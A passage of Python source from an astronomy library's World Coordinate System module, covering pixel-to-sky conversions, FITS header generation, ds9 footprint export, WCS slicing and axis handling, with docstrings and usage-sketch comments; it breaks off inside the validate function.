>>> print(radec) # doctest: +FLOAT_CMP
[[ 5.52645627 -72.05171757]
[ 5.52649663 -72.05171276]
[ 5.52653698 -72.05170795]]
>>> x, y = w.all_world2pix(ra, dec, 1)
>>> print(x) # doctest: +FLOAT_CMP
[ 1.00000238 2.00000237 3.00000236]
>>> print(y) # doctest: +FLOAT_CMP
[ 0.99999996 0.99999997 0.99999997]
>>> xy = w.all_world2pix(radec, 1)
>>> print(xy) # doctest: +FLOAT_CMP
[[ 1.00000238 0.99999996]
[ 2.00000237 0.99999997]
[ 3.00000236 0.99999997]]
>>> xy = w.all_world2pix(radec, 1, maxiter=3,
... tolerance=1.0e-10, quiet=False)
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 3 iterations, the solution is
diverging at least for one input point.
>>> # Now try to use some diverging data:
>>> divradec = w.all_pix2world([[1.0, 1.0],
... [10000.0, 50000.0],
... [3.0, 1.0]], 1)
>>> print(divradec) # doctest: +FLOAT_CMP
[[ 5.52645627 -72.05171757]
[ 7.15976932 -70.8140779 ]
[ 5.52653698 -72.05170795]]
>>> # First, turn detect_divergence on:
>>> try: # doctest: +FLOAT_CMP
... xy = w.all_world2pix(divradec, 1, maxiter=20,
... tolerance=1.0e-4, adaptive=False,
... detect_divergence=True,
... quiet=False)
... except wcs.wcs.NoConvergence as e:
... print("Indices of diverging points: {{0}}"
... .format(e.divergent))
... print("Indices of poorly converging points: {{0}}"
... .format(e.slow_conv))
... print("Best solution:\\n{{0}}".format(e.best_solution))
... print("Achieved accuracy:\\n{{0}}".format(e.accuracy))
Indices of diverging points: [1]
Indices of poorly converging points: None
Best solution:
[[ 1.00000238e+00 9.99999965e-01]
[ -1.99441636e+06 1.44309097e+06]
[ 3.00000236e+00 9.99999966e-01]]
Achieved accuracy:
[[ 6.13968380e-05 8.59638593e-07]
[ 8.59526812e+11 6.61713548e+11]
[ 6.09398446e-05 8.38759724e-07]]
>>> raise e
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 5 iterations, the solution is
diverging at least for one input point.
>>> # This time turn detect_divergence off:
>>> try: # doctest: +FLOAT_CMP
... xy = w.all_world2pix(divradec, 1, maxiter=20,
... tolerance=1.0e-4, adaptive=False,
... detect_divergence=False,
... quiet=False)
... except wcs.wcs.NoConvergence as e:
... print("Indices of diverging points: {{0}}"
... .format(e.divergent))
... print("Indices of poorly converging points: {{0}}"
... .format(e.slow_conv))
... print("Best solution:\\n{{0}}".format(e.best_solution))
... print("Achieved accuracy:\\n{{0}}".format(e.accuracy))
Indices of diverging points: [1]
Indices of poorly converging points: None
Best solution:
[[ 1.00000009 1. ]
[ nan nan]
[ 3.00000009 1. ]]
Achieved accuracy:
[[ 2.29417358e-06 3.21222995e-08]
[ nan nan]
[ 2.27407877e-06 3.13005639e-08]]
>>> raise e
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 6 iterations, the solution is
diverging at least for one input point.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('pixel coordinates', 8))
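# Illustrative sketch of the fixed-point iteration described in the notes
# above -- a conceptual outline using only public calls, not the actual
# implementation (which works in focal-plane coordinates and adds the
# divergence detection documented above):
#
#     target = w.wcs_world2pix(world, origin)    # distortion-free start
#     pix = target.copy()
#     for _ in range(maxiter):
#         resid = w.wcs_world2pix(w.all_pix2world(pix, origin), origin) - target
#         pix = pix - resid
#         if np.all(np.abs(resid) < tolerance):
#             break
#
# The real method vectorizes this over all points at once, which is why
# passing one long array is much faster than calling it point by point.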
def wcs_world2pix(self, *args, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda xy, o: self.wcs.s2p(xy, o)['pixcrd'],
'input', *args, **kwargs)
wcs_world2pix.__doc__ = """
Transforms world coordinates to pixel coordinates, using only
the basic `wcslib`_ WCS transformation. No `SIP`_ or
`distortion paper`_ table lookup transformation is applied.
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Notes
-----
The order of the axes for the input world array is determined by
the ``CTYPEia`` keywords in the FITS header, therefore it may
not always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('pixel coordinates', 8))
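# A minimal usage sketch (mirroring the all_world2pix doctest above; the test
# file shipped with astropy is assumed to be available):
#
#     from astropy.io import fits
#     from astropy import wcs
#     import os
#     filename = os.path.join(wcs.__path__[0], 'tests/data/j94f05bgq_flt.fits')
#     with fits.open(filename) as hdulist:
#         w = wcs.WCS(hdulist[('sci', 1)].header, hdulist)
#     x, y = w.wcs_world2pix([5.52645627], [-72.05171757], 1)
#
# Unlike all_world2pix, no SIP or distortion-paper correction is applied, so
# x, y are only the core wcslib solution.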
def pix2foc(self, *args):
return self._array_converter(self._pix2foc, None, *args)
pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using the
`SIP`_ polynomial distortion convention and `distortion
paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
def p4_pix2foc(self, *args):
return self._array_converter(self._p4_pix2foc, None, *args)
p4_pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using
`distortion paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
def det2im(self, *args):
return self._array_converter(self._det2im, None, *args)
det2im.__doc__ = """
Convert detector coordinates to image plane coordinates using
`distortion paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('pixel coordinates', 8))
def sip_pix2foc(self, *args):
if self.sip is None:
if len(args) == 2:
return args[0]
elif len(args) == 3:
return args[:2]
else:
raise TypeError("Wrong number of arguments")
return self._array_converter(self.sip.pix2foc, None, *args)
sip_pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using the
`SIP`_ polynomial distortion convention.
The output is in pixel coordinates, relative to ``CRPIX``.
FITS WCS `distortion paper`_ table lookup correction is not
applied, even if that information existed in the FITS file
that initialized this :class:`~astropy.wcs.WCS` object. To
correct for that, use `~astropy.wcs.WCS.pix2foc` or
`~astropy.wcs.WCS.p4_pix2foc`.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
def sip_foc2pix(self, *args):
if self.sip is None:
if len(args) == 2:
return args[0]
elif len(args) == 3:
return args[:2]
else:
raise TypeError("Wrong number of arguments")
return self._array_converter(self.sip.foc2pix, None, *args)
sip_foc2pix.__doc__ = """
Convert focal plane coordinates to pixel coordinates using the
`SIP`_ polynomial distortion convention.
FITS WCS `distortion paper`_ table lookup distortion
correction is not applied, even if that information existed in
the FITS file that initialized this `~astropy.wcs.WCS` object.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('pixel coordinates', 8))
def to_fits(self, relax=False, key=None):
"""
Generate an `astropy.io.fits.HDUList` object with all of the
information stored in this object. This should be logically identical
to the input FITS file, but it will be normalized in a number of ways.
See `to_header` for some warnings about the output produced.
Parameters
----------
relax : bool or int, optional
Degree of permissiveness:
- `False` (default): Write all extensions that are
considered to be safe and recommended.
- `True`: Write all recognized informal extensions of the
WCS standard.
- `int`: a bit field selecting specific extensions to
write. See :ref:`relaxwrite` for details.
key : str
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the ``"a"``
part of the ``CTYPEia`` cards.
Returns
-------
hdulist : `astropy.io.fits.HDUList`
"""
header = self.to_header(relax=relax, key=key)
hdu = fits.PrimaryHDU(header=header)
hdulist = fits.HDUList(hdu)
self._write_det2im(hdulist)
self._write_distortion_kw(hdulist)
return hdulist
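# A short usage sketch: serialize the WCS to an HDUList and write it out
# (the output path is only an example):
#
#     hdulist = w.to_fits(relax=True)
#     hdulist.writeto('wcs_only.fits', overwrite=True)
#
# Unlike to_header(), this also carries distortion-paper lookup tables, since
# those require extra HDUs.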
def to_header(self, relax=None, key=None):
"""Generate an `astropy.io.fits.Header` object with the basic WCS
and SIP information stored in this object. This should be
logically identical to the input FITS file, but it will be
normalized in a number of ways.
.. warning::
This function does not write out FITS WCS `distortion
paper`_ information, since that requires multiple FITS
header data units. To get a full representation of
everything in this object, use `to_fits`.
Parameters
----------
relax : bool or int, optional
Degree of permissiveness:
- `False` (default): Write all extensions that are
considered to be safe and recommended.
- `True`: Write all recognized informal extensions of the
WCS standard.
- `int`: a bit field selecting specific extensions to
write. See :ref:`relaxwrite` for details.
If the ``relax`` keyword argument is not given and any
keywords were omitted from the output, an
`~astropy.utils.exceptions.AstropyWarning` is displayed.
To override this, explicitly pass a value to ``relax``.
key : str
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the ``"a"``
part of the ``CTYPEia`` cards.
Returns
-------
header : `astropy.io.fits.Header`
Notes
-----
The output header will almost certainly differ from the input in a
number of respects:
1. The output header only contains WCS-related keywords. In
particular, it does not contain syntactically-required
keywords such as ``SIMPLE``, ``NAXIS``, ``BITPIX``, or
``END``.
2. Deprecated (e.g. ``CROTAn``) or non-standard usage will
be translated to standard (this is partially dependent on
whether ``fix`` was applied).
3. Quantities will be converted to the units used internally,
basically SI with the addition of degrees.
4. Floating-point quantities may be given to a different decimal
precision.
5. Elements of the ``PCi_j`` matrix will be written if and
only if they differ from the unit matrix. Thus, if the
matrix is unity then no elements will be written.
6. Additional keywords such as ``WCSAXES``, ``CUNITia``,
``LONPOLEa`` and ``LATPOLEa`` may appear.
7. The original keycomments will be lost, although
`to_header` tries hard to write meaningful comments.
8. Keyword order may be changed.
"""
# default precision for numerical WCS keywords
precision = WCSHDO_P14
display_warning = False
if relax is None:
display_warning = True
relax = False
if relax not in (True, False):
do_sip = relax & WCSHDO_SIP
relax &= ~WCSHDO_SIP
else:
do_sip = relax
relax = WCSHDO_all if relax is True else WCSHDO_safe
relax = precision | relax
if self.wcs is not None:
if key is not None:
orig_key = self.wcs.alt
self.wcs.alt = key
header_string = self.wcs.to_header(relax)
header = fits.Header.fromstring(header_string)
keys_to_remove = ["", " ", "COMMENT"]
for kw in keys_to_remove:
if kw in header:
del header[kw]
else:
header = fits.Header()
if do_sip and self.sip is not None:
if self.wcs is not None and any(not ctyp.endswith('-SIP') for ctyp in self.wcs.ctype):
self._fix_ctype(header, add_sip=True)
for kw, val in self._write_sip_kw().items():
header[kw] = val
if not do_sip and self.wcs is not None and any(self.wcs.ctype) and self.sip is not None:
# This is called when relax is not False or WCSHDO_SIP
# The default case of ``relax=None`` is handled further in the code.
header = self._fix_ctype(header, add_sip=False)
if display_warning:
full_header = self.to_header(relax=True, key=key)
missing_keys = []
for kw, val in full_header.items():
if kw not in header:
missing_keys.append(kw)
if len(missing_keys):
warnings.warn(
"Some non-standard WCS keywords were excluded: {} "
"Use the ``relax`` kwarg to control this.".format(
', '.join(missing_keys)),
AstropyWarning)
# called when ``relax=None``
# This is different from the case of ``relax=False``.
if any(self.wcs.ctype) and self.sip is not None:
header = self._fix_ctype(header, add_sip=False, log_message=False)
# Finally reset the key. This must be called after ``_fix_ctype``.
if key is not None:
self.wcs.alt = orig_key
return header
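# A short usage sketch for the ``relax`` keyword described above:
#
#     hdr_safe = w.to_header()            # may warn if non-standard keywords are dropped
#     hdr_all = w.to_header(relax=True)   # also writes recognized informal extensions
#
# Passing an explicit ``relax`` value avoids the AstropyWarning mentioned in
# the docstring.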
def _fix_ctype(self, header, add_sip=True, log_message=True):
"""
Parameters
----------
header : `~astropy.io.fits.Header`
FITS header.
add_sip : bool
Flag indicating whether "-SIP" should be added or removed from CTYPE keywords.
Remove "-SIP" from CTYPE when writing out a header with relax=False.
This needs to be done outside ``to_header`` because ``to_header`` runs
twice when ``relax=False`` and the second time ``relax`` is set to ``True``
to display the missing keywords.
If the user requested SIP distortion to be written out add "-SIP" to
CTYPE if it is missing.
"""
_add_sip_to_ctype = """
Inconsistent SIP distortion information is present in the current WCS:
SIP coefficients were detected, but CTYPE is missing "-SIP" suffix,
therefore the current WCS is internally inconsistent.
Because relax has been set to True, the resulting output WCS will have
"-SIP" appended to CTYPE in order to make the header internally consistent.
However, this may produce incorrect astrometry in the output WCS, if
in fact the current WCS is already distortion-corrected.
Therefore, if current WCS is already distortion-corrected (eg, drizzled)
then SIP distortion components should not apply. In that case, for a WCS
that is already distortion-corrected, please remove the SIP coefficients
from the header.
"""
if log_message:
if add_sip:
log.info(_add_sip_to_ctype)
for i in range(1, self.naxis+1):
# strip() must be called here to cover the case of alt key= " "
kw = f'CTYPE{i}{self.wcs.alt}'.strip()
if kw in header:
if add_sip:
val = header[kw].strip("-SIP") + "-SIP"
else:
val = header[kw].strip("-SIP")
header[kw] = val
else:
continue
return header
def to_header_string(self, relax=None):
"""
Identical to `to_header`, but returns a string containing the
header cards.
"""
return str(self.to_header(relax))
def footprint_to_file(self, filename='footprint.reg', color='green',
width=2, coordsys=None):
"""
Writes out a `ds9`_ style regions file. It can be loaded
directly by `ds9`_.
Parameters
----------
filename : str, optional
Output file name - default is ``'footprint.reg'``
color : str, optional
Color to use when plotting the line.
width : int, optional
Width of the region line.
coordsys : str, optional
Coordinate system. If not specified (default), the ``radesys``
value is used. For all possible values, see
http://ds9.si.edu/doc/ref/region.html#RegionFileFormat
"""
comments = ('# Region file format: DS9 version 4.0 \n'
'# global color=green font="helvetica 12 bold '
'select=1 highlite=1 edit=1 move=1 delete=1 '
'include=1 fixed=0 source\n')
coordsys = coordsys or self.wcs.radesys
if coordsys not in ('PHYSICAL', 'IMAGE', 'FK4', 'B1950', 'FK5',
'J2000', 'GALACTIC', 'ECLIPTIC', 'ICRS', 'LINEAR',
'AMPLIFIER', 'DETECTOR'):
raise ValueError("Coordinate system '{}' is not supported. A valid"
" one can be given with the 'coordsys' argument."
.format(coordsys))
with open(filename, mode='w') as f:
f.write(comments)
f.write(f'{coordsys}\n')
f.write('polygon(')
ftpr = self.calc_footprint()
if ftpr is not None:
ftpr.tofile(f, sep=',')
f.write(f') # color={color}, width={width:d} \n')
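# A minimal usage sketch (file name, colour and width are arbitrary examples):
#
#     w.footprint_to_file('footprint.reg', color='red', width=2,
#                         coordsys='ICRS')
#
# The resulting region file can be loaded directly into ds9.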
def _get_naxis(self, header=None):
_naxis = []
if (header is not None and
not isinstance(header, (str, bytes))):
for naxis in itertools.count(1):
try:
_naxis.append(header[f'NAXIS{naxis}'])
except KeyError:
break
if len(_naxis) == 0:
_naxis = [0, 0]
elif len(_naxis) == 1:
_naxis.append(0)
self._naxis = _naxis
def printwcs(self):
print(repr(self))
def __repr__(self):
'''
Return a short description. Simply porting the behavior from
the `printwcs()` method.
'''
description = ["WCS Keywords\n",
f"Number of WCS axes: {self.naxis!r}"]
sfmt = ' : ' + "".join(["{"+f"{i}"+"!r} " for i in range(self.naxis)])
keywords = ['CTYPE', 'CRVAL', 'CRPIX']
values = [self.wcs.ctype, self.wcs.crval, self.wcs.crpix]
for keyword, value in zip(keywords, values):
description.append(keyword+sfmt.format(*value))
if hasattr(self.wcs, 'pc'):
for i in range(self.naxis):
s = ''
for j in range(self.naxis):
s += ''.join(['PC', str(i+1), '_', str(j+1), ' '])
s += sfmt
description.append(s.format(*self.wcs.pc[i]))
s = 'CDELT' + sfmt
description.append(s.format(*self.wcs.cdelt))
elif hasattr(self.wcs, 'cd'):
for i in range(self.naxis):
s = ''
for j in range(self.naxis):
s += "".join(['CD', str(i+1), '_', str(j+1), ' '])
s += sfmt
description.append(s.format(*self.wcs.cd[i]))
description.append('NAXIS : {}'.format(' '.join(map(str, self._naxis))))
return '\n'.join(description)
def get_axis_types(self):
"""
Similar to `self.wcsprm.axis_types <astropy.wcs.Wcsprm.axis_types>`
but provides the information in a more Python-friendly format.
Returns
-------
result : list of dicts
Returns a list of dictionaries, one for each axis, each
containing attributes about the type of that axis.
Each dictionary has the following keys:
- 'coordinate_type':
- None: Non-specific coordinate type.
- 'stokes': Stokes coordinate.
- 'celestial': Celestial coordinate (including ``CUBEFACE``).
- 'spectral': Spectral coordinate.
- 'scale':
- 'linear': Linear axis.
- 'quantized': Quantized axis (``STOKES``, ``CUBEFACE``).
- 'non-linear celestial': Non-linear celestial axis.
- 'non-linear spectral': Non-linear spectral axis.
- 'logarithmic': Logarithmic axis.
- 'tabular': Tabular axis.
- 'group'
- Group number, e.g. lookup table number
- 'number'
- For celestial axes:
- 0: Longitude coordinate.
- 1: Latitude coordinate.
- 2: ``CUBEFACE`` number.
- For lookup tables:
- the axis number in a multidimensional table.
``CTYPEia`` in ``"4-3"`` form with unrecognized algorithm code will
generate an error.
"""
if self.wcs is None:
raise AttributeError(
"This WCS object does not have a wcsprm object.")
coordinate_type_map = {
0: None,
1: 'stokes',
2: 'celestial',
3: 'spectral'}
scale_map = {
0: 'linear',
1: 'quantized',
2: 'non-linear celestial',
3: 'non-linear spectral',
4: 'logarithmic',
5: 'tabular'}
result = []
for axis_type in self.wcs.axis_types:
subresult = {}
coordinate_type = (axis_type // 1000) % 10
subresult['coordinate_type'] = coordinate_type_map[coordinate_type]
scale = (axis_type // 100) % 10
subresult['scale'] = scale_map[scale]
group = (axis_type // 10) % 10
subresult['group'] = group
number = axis_type % 10
subresult['number'] = number
result.append(subresult)
return result
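# A short usage sketch; for a typical two-axis celestial image this returns
# one dict per axis, roughly (values illustrative only):
#
#     types = w.get_axis_types()
#     # [{'coordinate_type': 'celestial', 'scale': 'non-linear celestial',
#     #   'group': 0, 'number': 0},
#     #  {'coordinate_type': 'celestial', 'scale': 'non-linear celestial',
#     #   'group': 0, 'number': 1}]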
def __reduce__(self):
"""
Support pickling of WCS objects. This is done by serializing
to an in-memory FITS file and dumping that as a string.
"""
hdulist = self.to_fits(relax=True)
buffer = io.BytesIO()
hdulist.writeto(buffer)
return (__WCS_unpickle__,
(self.__class__, self.__dict__, buffer.getvalue(),))
def dropaxis(self, dropax):
"""
Remove an axis from the WCS.
Parameters
----------
wcs : `~astropy.wcs.WCS`
The WCS with naxis to be chopped to naxis-1
dropax : int
The index of the WCS to drop, counting from 0 (i.e., python convention,
not FITS convention)
Returns
-------
A new `~astropy.wcs.WCS` instance with one axis fewer
"""
inds = list(range(self.wcs.naxis))
inds.pop(dropax)
# axis 0 has special meaning to sub
# if wcs.wcs.ctype == ['RA','DEC','VLSR'], you want
# wcs.sub([1,2]) to get 'RA','DEC' back
return self.sub([i+1 for i in inds])
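# A minimal sketch, reusing the ctype example from the comment above: for a
# cube WCS with ctype ['RA---TAN', 'DEC--TAN', 'VLSR'], dropping the spectral
# axis keeps only the celestial pair:
#
#     celestial_only = cube_wcs.dropaxis(2)   # equivalent to cube_wcs.sub([1, 2])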
def swapaxes(self, ax0, ax1):
"""
Swap axes in a WCS.
Parameters
----------
wcs : `~astropy.wcs.WCS`
The WCS to have its axes swapped
ax0 : int
ax1 : int
The indices of the WCS to be swapped, counting from 0 (i.e., python
convention, not FITS convention)
Returns
-------
A new `~astropy.wcs.WCS` instance with the same number of axes, but two
swapped
"""
inds = list(range(self.wcs.naxis))
inds[ax0], inds[ax1] = inds[ax1], inds[ax0]
return self.sub([i+1 for i in inds])
def reorient_celestial_first(self):
"""
Reorient the WCS such that the celestial axes are first, followed by
the spectral axis, followed by any others.
Assumes at least celestial axes are present.
"""
return self.sub([WCSSUB_CELESTIAL, WCSSUB_SPECTRAL, WCSSUB_STOKES])
def slice(self, view, numpy_order=True):
"""
Slice a WCS instance using a Numpy slice. The order of the slice should
be reversed (as for the data) compared to the natural WCS order.
Parameters
----------
view : tuple
A tuple containing the same number of slices as the WCS system.
The ``step`` method, the third argument to a slice, is not
presently supported.
numpy_order : bool
Use numpy order, i.e. slice the WCS so that an identical slice
applied to a numpy array will slice the array and WCS in the same
way. If set to `False`, the WCS will be sliced in FITS order,
meaning the first slice will be applied to the *last* numpy index
but the *first* WCS axis.
Returns
-------
wcs_new : `~astropy.wcs.WCS`
A new resampled WCS axis
"""
if hasattr(view, '__len__') and len(view) > self.wcs.naxis:
raise ValueError("Must have # of slices <= # of WCS axes")
elif not hasattr(view, '__len__'): # view MUST be an iterable
view = [view]
if not all(isinstance(x, slice) for x in view):
# We need to drop some dimensions, but this may not always be
# possible with .sub due to correlated axes, so instead we use the
# generalized slicing infrastructure from astropy.wcs.wcsapi.
return SlicedFITSWCS(self, view)
# NOTE: we could in principle use SlicedFITSWCS as above for all slicing,
# but in the simple case where there are no axes dropped, we can just
# create a full WCS object with updated WCS parameters which is faster
# for this specific case and also backward-compatible.
wcs_new = self.deepcopy()
if wcs_new.sip is not None:
sip_crpix = wcs_new.sip.crpix.tolist()
for i, iview in enumerate(view):
if iview.step is not None and iview.step < 0:
raise NotImplementedError("Reversing an axis is not "
"implemented.")
if numpy_order:
wcs_index = self.wcs.naxis - 1 - i
else:
wcs_index = i
if iview.step is not None and iview.start is None:
# Slice from "None" is equivalent to slice from 0 (but one
# might want to downsample, so allow slices with
# None,None,step or None,stop,step)
iview = slice(0, iview.stop, iview.step)
if iview.start is not None:
if iview.step not in (None, 1):
crpix = self.wcs.crpix[wcs_index]
cdelt = self.wcs.cdelt[wcs_index]
# equivalently (keep this comment so you can compare eqns):
# wcs_new.wcs.crpix[wcs_index] =
# (crpix - iview.start)*iview.step + 0.5 - iview.step/2.
crp = ((crpix - iview.start - 1.)/iview.step
+ 0.5 + 1./iview.step/2.)
wcs_new.wcs.crpix[wcs_index] = crp
if wcs_new.sip is not None:
sip_crpix[wcs_index] = crp
wcs_new.wcs.cdelt[wcs_index] = cdelt * iview.step
else:
wcs_new.wcs.crpix[wcs_index] -= iview.start
if wcs_new.sip is not None:
sip_crpix[wcs_index] -= iview.start
try:
# range requires integers but the other attributes can also
# handle arbitrary values, so this needs to be in a try/except.
nitems = len(builtins.range(self._naxis[wcs_index])[iview])
except TypeError as exc:
if 'indices must be integers' not in str(exc):
raise
warnings.warn("NAXIS{} attribute is not updated because at "
"least one index ('{}') is no integer."
"".format(wcs_index, iview), AstropyUserWarning)
else:
wcs_new._naxis[wcs_index] = nitems
if wcs_new.sip is not None:
wcs_new.sip = Sip(self.sip.a, self.sip.b, self.sip.ap, self.sip.bp,
sip_crpix)
return wcs_new
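# A minimal usage sketch of slicing a 2-D image WCS (numpy order):
#
#     cutout_wcs = w.slice((slice(100, 200), slice(50, 150)))
#     # or, via __getitem__ below:  w[100:200, 50:150]
#
# CRPIX and the NAXISj bookkeeping are shifted so pixel coordinates in the
# cutout still map to the same sky positions.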
def __getitem__(self, item):
# "getitem" is a shortcut for self.slice; it is very limited
# there is no obvious and unambiguous interpretation of wcs[1,2,3]
# We COULD allow wcs[1] to link to wcs.sub([2])
# (wcs[i] -> wcs.sub([i+1])
return self.slice(item)
def __iter__(self):
# Having __getitem__ makes Python think WCS is iterable. However,
# Python first checks whether __iter__ is present, so we can raise an
# exception here.
raise TypeError(f"'{self.__class__.__name__}' object is not iterable")
@property
def axis_type_names(self):
"""
World names for each coordinate axis
Returns
-------
A list of names along each axis
"""
names = list(self.wcs.cname)
types = self.wcs.ctype
for i in range(len(names)):
if len(names[i]) > 0:
continue
names[i] = types[i].split('-')[0]
return names
@property
def celestial(self):
"""
A copy of the current WCS with only the celestial axes included
"""
return self.sub([WCSSUB_CELESTIAL])
@property
def is_celestial(self):
return self.has_celestial and self.naxis == 2
@property
def has_celestial(self):
try:
return self.wcs.lng >= 0 and self.wcs.lat >= 0
except InconsistentAxisTypesError:
return False
@property
def spectral(self):
"""
A copy of the current WCS with only the spectral axes included
"""
return self.sub([WCSSUB_SPECTRAL])
@property
def is_spectral(self):
return self.has_spectral and self.naxis == 1
@property
def has_spectral(self):
try:
return self.wcs.spec >= 0
except InconsistentAxisTypesError:
return False
@property
def has_distortion(self):
"""
Returns `True` if any distortion terms are present.
"""
return (self.sip is not None or
self.cpdis1 is not None or self.cpdis2 is not None or
self.det2im1 is not None and self.det2im2 is not None)
@property
def pixel_scale_matrix(self):
try:
cdelt = np.diag(self.wcs.get_cdelt())
pc = self.wcs.get_pc()
except InconsistentAxisTypesError:
try:
# for non-celestial axes, get_cdelt doesn't work
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'cdelt will be ignored since cd is present', RuntimeWarning)
cdelt = np.dot(self.wcs.cd, np.diag(self.wcs.cdelt))
except AttributeError:
cdelt = np.diag(self.wcs.cdelt)
try:
pc = self.wcs.pc
except AttributeError:
pc = 1
pccd = np.array(np.dot(cdelt, pc))
return pccd
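# A short sketch of a common use of this matrix (assuming a celestial WCS in
# degrees): the column norms of CDELT @ PC give approximate per-axis pixel
# scales,
#
#     scales = np.sqrt((w.pixel_scale_matrix ** 2).sum(axis=0))  # deg / pixel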
def footprint_contains(self, coord, **kwargs):
"""
Determines if a given SkyCoord is contained in the wcs footprint.
Parameters
----------
coord : `~astropy.coordinates.SkyCoord`
The coordinate to check for containment within the WCS footprint.
**kwargs :
Additional arguments to pass to `~astropy.coordinates.SkyCoord.to_pixel`
Returns
-------
response : bool
True means the WCS footprint contains the coordinate, False means it does not.
"""
return coord.contained_by(self, **kwargs)
def __WCS_unpickle__(cls, dct, fits_data):
"""
Unpickles a WCS object from a serialized FITS string.
"""
self = cls.__new__(cls)
self.__dict__.update(dct)
buffer = io.BytesIO(fits_data)
hdulist = fits.open(buffer)
WCS.__init__(self, hdulist[0].header, hdulist)
return self
def find_all_wcs(header, relax=True, keysel=None, fix=True,
translate_units='',
_do_set=True):
"""
Find all the WCS transformations in the given header.
Parameters
----------
header : str or astropy.io.fits header object.
relax : bool or int, optional
Degree of permissiveness:
- `True` (default): Admit all recognized informal extensions of the
WCS standard.
- `False`: Recognize only FITS keywords defined by the
published WCS standard.
- `int`: a bit field selecting specific extensions to accept.
See :ref:`relaxread` for details.
keysel : sequence of flags, optional
A list of flags used to select the keyword types considered by
wcslib. When ``None``, only the standard image header
keywords are considered (and the underlying wcspih() C
function is called). To use binary table image array or pixel
list keywords, *keysel* must be set.
Each element in the list should be one of the following strings:
- 'image': Image header keywords
- 'binary': Binary table image array keywords
- 'pixel': Pixel list keywords
Keywords such as ``EQUIna`` or ``RFRQna`` that are common to
binary table image arrays and pixel lists (including
``WCSNna`` and ``TWCSna``) are selected by both 'binary' and
'pixel'.
fix : bool, optional
When `True` (default), call `~astropy.wcs.Wcsprm.fix` on
the resulting objects to fix any non-standard uses in the
header. `FITSFixedWarning` warnings will be emitted if any
changes were made.
translate_units : str, optional
Specify which potentially unsafe translations of non-standard
unit strings to perform. By default, performs none. See
`WCS.fix` for more information about this parameter. Only
effective when ``fix`` is `True`.
Returns
-------
wcses : list of `WCS` objects
"""
if isinstance(header, (str, bytes)):
header_string = header
elif isinstance(header, fits.Header):
header_string = header.tostring()
else:
raise TypeError(
"header must be a string or astropy.io.fits.Header object")
keysel_flags = _parse_keysel(keysel)
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
else:
header_bytes = header_string
wcsprms = _wcs.find_all_wcs(header_bytes, relax, keysel_flags)
result = []
for wcsprm in wcsprms:
subresult = WCS(fix=False, _do_set=False)
subresult.wcs = wcsprm
result.append(subresult)
if fix:
subresult.fix(translate_units)
if _do_set:
subresult.wcs.set()
return result
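# A minimal usage sketch: collect every WCS (primary plus alternate keys)
# present in a header (the file path is only an example):
#
#     from astropy.io import fits
#     hdr = fits.getheader('image.fits')
#     wcses = find_all_wcs(hdr, relax=True)
#     keys = [w.wcs.alt for w in wcses]   # e.g. [' ', 'A', ...]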
def validate(source):
"""
Prints a WCS validation report for the given FITS file.
Parameters
----------
source : str path, readable file-like object or `astropy.io.fits.HDUList` object
The FITS file to validate.
Returns
-------
results : WcsValidateResults instance
The result is returned as nested lists. The first level
corresponds to the HDUs in the given file. The next level has
an entry for each WCS found in that header. The special
subclass of list will pretty-print the results as a table when
printed.
"""
class _WcsValidateWcsResult(list):
def __init__(self, key):
self._key = key
def __repr__(self):
result = [" WCS key '{}':".format(self._key or ' ')]
if len(self):
for entry in self:
for i, line in enumerate(entry.splitlines()):
if i == 0:
initial_indent = ' - '
else:
initial_indent = ' '
result.extend(
textwrap.wrap(
line,
initial_indent=initial_indent,
